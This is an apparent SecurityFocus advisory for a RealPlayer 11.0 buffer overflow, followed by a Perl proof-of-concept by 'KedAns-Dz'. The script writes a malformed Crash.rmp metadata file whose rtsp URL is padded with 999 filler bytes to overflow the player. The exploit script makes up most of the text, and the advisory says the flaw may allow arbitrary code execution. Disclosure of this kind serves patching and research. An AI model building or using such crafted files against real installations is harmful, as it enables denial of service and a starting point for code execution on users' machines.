source: https://www.securityfocus.com/bid/47039/info
RealPlayer is prone to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
RealPlayer 11.0 is vulnerable; other versions may also be affected.
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "\n\n";
print " |============================================================|\n";
print " |= [!] Name : RealPlayer v11.0 Real Metadata Package File =|\n";
print " |= [!] Exploit : Buffer Overflow =|\n";
print " |= [!] Author : KedAns-Dz =|\n";
print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n";
print " |============================================================|\n";
sleep(2);
print "\n";
my $kA = "\x41" x 333 ;
my $kB = "\x42" x 333 ;
my $kC = "\x43" x 333 ;
my $buffer = $kA.$kB.$kC ;
my $header =
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31".
"\x2e\x30\x22\x3f\x3e\x0d\x0d\x3c\x65\x6d\x62\x65\x64\x20\x73\x72".
"\x63\x3d\x22\x72\x74\x73\x70\x3a\x2f\x2f".$buffer."\x22\x20\x61\x75\x74\x6f".
"\x70\x6c\x61\x79\x3d\x22\x77\x68\x61\x74\x65\x76\x65\x72\x22\x20".
"\x2f\x3e\x00";
my $kedans = $header ;
open (FILE ,"> Crash.rmp");
print FILE $kedans ;
print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
close (FILE);
Recommended Comments